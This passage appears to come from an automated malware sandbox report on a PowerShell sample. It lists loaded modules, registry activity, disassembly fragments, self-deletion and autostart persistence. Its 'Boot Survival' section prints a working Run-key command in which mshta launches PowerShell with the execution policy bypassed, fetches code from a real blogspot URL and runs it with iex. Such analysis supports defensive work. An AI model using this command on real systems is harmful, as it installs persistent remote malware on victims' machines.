Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: o3KyzpE7F4.ps1

Static file information: File size 4056486 > 1048576

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A77A23 push eax; retf	5_2_00A77A2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A77A08 push eax; retf	5_2_00A77A22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A77A41 push eax; retf	5_2_00A77A42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A77CE1 push ecx; retf	5_2_00A77CE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A77CD8 push ebx; retf	5_2_00A77CDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_04D358F4 push eax; retf	5_2_04D358F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0670202D push eax; ret	5_2_06702B29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0677011E push es; retf 7701h	5_2_067718F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_067918F6 push ss; iretd	5_2_067918F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0679575F push es; ret	5_2_06795760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_067A60EB push es; ret	5_2_067A60EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_067A6097 push es; ret	5_2_067A60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_068A0080 push es; ret	5_2_068A5F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_068A5E85 push es; ret	5_2_068A5F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_068A60AA push es; retf	5_2_068A612C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_068A60EA push es; retf	5_2_068A612C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_068A571F push ebp; iretd	5_2_068A5720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_068A3116 push esp; iretd	5_2_068A3119
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 6_2_00FC2739 push edi; retf 006Bh	6_2_00FC273A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 6_2_00FC28B9 push eax; retf 006Bh	6_2_00FC28BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 6_2_00FC277B push ecx; retf 006Bh	6_2_00FC2782
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 6_2_00FC2768 push edi; retf 006Bh	6_2_00FC2776
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 6_2_00FC29A0 push esp; iretd	6_2_00FC29A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 6_2_00FC265D push edi; retf 006Bh	6_2_00FC265E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 6_2_00FC26D9 push edi; retf 006Bh	6_2_00FC26DA
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 8_2_00F02739 push edi; retf 006Bh	8_2_00F0273A
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 8_2_00F028B9 push eax; retf 006Bh	8_2_00F028BA
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 8_2_00F0277B push ecx; retf 006Bh	8_2_00F02782
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 8_2_00F029A0 push esp; iretd	8_2_00F029A1
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 8_2_00F02768 push edi; retf 006Bh	8_2_00F02776
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Code function: 8_2_00F0265D push edi; retf 006Bh	8_2_00F0265E

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2

Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2 mshta "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3],ql[0],ql[1],ql[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);".

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\o3kyzpe7f4.ps1

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
